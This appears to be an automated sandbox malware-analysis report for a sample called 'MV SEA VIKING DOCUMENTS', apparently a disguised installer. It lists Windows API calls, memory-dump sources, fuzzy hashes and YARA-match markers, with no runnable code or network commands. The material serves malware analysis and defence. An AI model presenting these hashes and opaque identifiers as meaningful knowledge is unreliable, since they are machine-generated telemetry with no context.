                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                • Opcode ID: 897c77713e642b49c24dd6eb1c28b3726513ee33cef4162b7e77dcba8ef48a09
                                                                                                                                                                                                                                • Instruction ID: 5363df5263369699d54e5603e5073d0cd2069be19b6a2dc2c291146d9d445bf3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 897c77713e642b49c24dd6eb1c28b3726513ee33cef4162b7e77dcba8ef48a09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2B012F2A08000DFEE008B65CD06F343264E710301F284000F600F4180C12048008734
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                                                                                • API String ID: 2624150263-3142480687
                                                                                                                                                                                                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 714912BB: GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71491D2D
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 71491D75
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 71491D7F
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491D92
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E74
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E79
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E7E
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71492068
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 71492222
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 714922A1
                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 714922B2
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 7149230C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 71492326
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 245916457-0
                                                                                                                                                                                                                                • Opcode ID: 94f6ce571b1a29c1d81c19d82183dc232bbaa2639cf5dee8fc9b8bd6f6e5c4f3
                                                                                                                                                                                                                                • Instruction ID: ce81d16a448b726e307faeb2e14e6a7b51dd4459b84c10e99a2c37866311974b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94f6ce571b1a29c1d81c19d82183dc232bbaa2639cf5dee8fc9b8bd6f6e5c4f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B22CEB1D0420ADFDB12CFA4C584AEEBFB1FB04725F11462ED1A7E2284D7705A86CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 542301482-670666241
                                                                                                                                                                                                                                • Opcode ID: 55b86572cfb51834f8a6099f072212e72d4708fdd526940039725dd414464e6b
                                                                                                                                                                                                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b86572cfb51834f8a6099f072212e72d4708fdd526940039725dd414464e6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                • Opcode ID: 87a3b61e224089aac6125e07325768922ee80bc423a702a39b70ed539d3d6996
                                                                                                                                                                                                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a3b61e224089aac6125e07325768922ee80bc423a702a39b70ed539d3d6996
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `wI
                                                                                                                                                                                                                                • API String ID: 0-1626042186
                                                                                                                                                                                                                                • Opcode ID: f48f528460ef97ffbd6e380b9c1f36b03ac9478392f229a26f28eb12f555722e
                                                                                                                                                                                                                                • Instruction ID: d8255971cd993a19eb7780f67d53d9c0faa8bcb86db6ac15bfa47fa69a4a8e16
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f48f528460ef97ffbd6e380b9c1f36b03ac9478392f229a26f28eb12f555722e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08616AB21843D956DB314E78484AFEB3BF2AF43A94F59024FDCC89B196C32A4586C752
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ;
                                                                                                                                                                                                                                • API String ID: 0-1661535913
                                                                                                                                                                                                                                • Opcode ID: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction ID: 72aaf11048afc091d9600dcc84b0d53d3bc4fb00dc2378fe877228c101d6706a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C851CE716446458FEF34CE29CC90BDA33B2EF99754F59812ECC499B706C3349A8ACB01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %aGZ
                                                                                                                                                                                                                                • API String ID: 0-3409657903
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: Call$N
                                                                                                                                                                                                                                • API String ID: 3103080414-3438112850
                                                                                                                                                                                                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
